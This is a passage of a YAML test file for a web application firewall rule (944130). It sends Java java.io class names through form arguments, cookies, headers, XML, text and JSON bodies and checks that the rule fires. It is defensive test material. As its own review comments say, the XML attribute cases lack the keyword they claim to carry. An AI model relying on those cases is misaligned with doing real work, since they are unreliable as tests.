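  # of this listing). Each case sends one HTTP/1.0 POST to 127.0.0.1:80 and
  # expects the log to contain: id "944130".
  # The original line layout was lost; block structure is restored below with
  # every key and value unchanged.
  #
  # Each java.io class name is run through the same eleven carriers, in order:
  # argument value, argument name, cookie value, cookie name, request header
  # named "test", XML attribute value, XML element value, nested XML element
  # value, text/plain body, JSON value, JSON name.
  #
  # NOTE(review): the three XML cases carry no XML markup in data as printed.
  # The "XML attribute value" case holds only "element_value" (keyword absent),
  # and the "XML element value" and "Nested XML element value" cases have
  # identical bodies. The markup was presumably stripped in extraction; restore
  # these bodies from the upstream file before relying on the cases.
  #
  # Every case here asserts a match (log_contains); none asserts a non-match,
  # so false-positive behaviour is not covered by this span.

  # java.io.FilterInputStream: last case of the group (JSON name).
  - test_title: 944130-120
    desc: "Content-Type application/json arg name includes keyword java.io.FilterInputStream"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"java.io.FilterInputStream\": \"test\"}"
          output:
            log_contains: "id \"944130\""

  # java.io.FilterOutputStream: cases 944130-121 to 944130-131.
  - test_title: 944130-121
    desc: "Argument test includes keyword java.io.FilterOutputStream"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=java.io.FilterOutputStream"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-122
    desc: "Argument name includes keyword java.io.FilterOutputStream"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "java.io.FilterOutputStream=test"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-123
    desc: "Cookie test includes keyword java.io.FilterOutputStream"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: test=java.io.FilterOutputStream
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-124
    desc: "Cookie name includes keyword java.io.FilterOutputStream"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: java.io.FilterOutputStream=test
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-125
    desc: "Request header test includes keyword java.io.FilterOutputStream"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              test: java.io.FilterOutputStream
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  # NOTE(review): as printed, data is just "element_value" -- the keyword named
  # in desc is absent, so the XML markup was presumably lost in extraction.
  - test_title: 944130-126
    desc: "XML attribute value includes keyword java.io.FilterOutputStream"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "element_value"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-127
    desc: "XML element value includes keyword java.io.FilterOutputStream"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "java.io.FilterOutputStream"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-128
    desc: "Nested XML element value includes keyword java.io.FilterOutputStream"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "java.io.FilterOutputStream"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-129
    desc: "Content-Type text/plain includes keyword java.io.FilterOutputStream"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "text/plain"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=java.io.FilterOutputStream"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-130
    desc: "Content-Type application/json arg value includes keyword java.io.FilterOutputStream"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"test\": \"java.io.FilterOutputStream\"}"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-131
    desc: "Content-Type application/json arg name includes keyword java.io.FilterOutputStream"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"java.io.FilterOutputStream\": \"test\"}"
          output:
            log_contains: "id \"944130\""

  # java.io.FilterReader: cases 944130-132 to 944130-142.
  - test_title: 944130-132
    desc: "Argument test includes keyword java.io.FilterReader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=java.io.FilterReader"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-133
    desc: "Argument name includes keyword java.io.FilterReader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "java.io.FilterReader=test"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-134
    desc: "Cookie test includes keyword java.io.FilterReader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: test=java.io.FilterReader
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-135
    desc: "Cookie name includes keyword java.io.FilterReader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: java.io.FilterReader=test
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-136
    desc: "Request header test includes keyword java.io.FilterReader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              test: java.io.FilterReader
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  # NOTE(review): as printed, data is just "element_value" -- the keyword named
  # in desc is absent, so the XML markup was presumably lost in extraction.
  - test_title: 944130-137
    desc: "XML attribute value includes keyword java.io.FilterReader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "element_value"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-138
    desc: "XML element value includes keyword java.io.FilterReader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "java.io.FilterReader"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-139
    desc: "Nested XML element value includes keyword java.io.FilterReader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "java.io.FilterReader"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-140
    desc: "Content-Type text/plain includes keyword java.io.FilterReader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "text/plain"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=java.io.FilterReader"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-141
    desc: "Content-Type application/json arg value includes keyword java.io.FilterReader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"test\": \"java.io.FilterReader\"}"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-142
    desc: "Content-Type application/json arg name includes keyword java.io.FilterReader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"java.io.FilterReader\": \"test\"}"
          output:
            log_contains: "id \"944130\""

  # java.io.InputStream: cases 944130-143 to 944130-153.
  - test_title: 944130-143
    desc: "Argument test includes keyword java.io.InputStream"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=java.io.InputStream"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-144
    desc: "Argument name includes keyword java.io.InputStream"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "java.io.InputStream=test"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-145
    desc: "Cookie test includes keyword java.io.InputStream"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: test=java.io.InputStream
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-146
    desc: "Cookie name includes keyword java.io.InputStream"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: java.io.InputStream=test
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-147
    desc: "Request header test includes keyword java.io.InputStream"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              test: java.io.InputStream
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  # NOTE(review): as printed, data is just "element_value" -- the keyword named
  # in desc is absent, so the XML markup was presumably lost in extraction.
  - test_title: 944130-148
    desc: "XML attribute value includes keyword java.io.InputStream"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "element_value"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-149
    desc: "XML element value includes keyword java.io.InputStream"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "java.io.InputStream"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-150
    desc: "Nested XML element value includes keyword java.io.InputStream"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "java.io.InputStream"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-151
    desc: "Content-Type text/plain includes keyword java.io.InputStream"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "text/plain"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=java.io.InputStream"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-152
    desc: "Content-Type application/json arg value includes keyword java.io.InputStream"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"test\": \"java.io.InputStream\"}"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-153
    desc: "Content-Type application/json arg name includes keyword java.io.InputStream"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"java.io.InputStream\": \"test\"}"
          output:
            log_contains: "id \"944130\""

  # java.io.InputStreamReader: cases 944130-154 to 944130-164.
  - test_title: 944130-154
    desc: "Argument test includes keyword java.io.InputStreamReader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=java.io.InputStreamReader"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-155
    desc: "Argument name includes keyword java.io.InputStreamReader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "java.io.InputStreamReader=test"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-156
    desc: "Cookie test includes keyword java.io.InputStreamReader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: test=java.io.InputStreamReader
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-157
    desc: "Cookie name includes keyword java.io.InputStreamReader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: java.io.InputStreamReader=test
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-158
    desc: "Request header test includes keyword java.io.InputStreamReader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              test: java.io.InputStreamReader
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944130\""
  # NOTE(review): as printed, data is just "element_value" -- the keyword named
  # in desc is absent, so the XML markup was presumably lost in extraction.
  - test_title: 944130-159
    desc: "XML attribute value includes keyword java.io.InputStreamReader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "element_value"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-160
    desc: "XML element value includes keyword java.io.InputStreamReader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "java.io.InputStreamReader"
          output:
            log_contains: "id \"944130\""
  - test_title: 944130-161
    desc: "Nested XML element value includes keyword java.io.InputStreamReader"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
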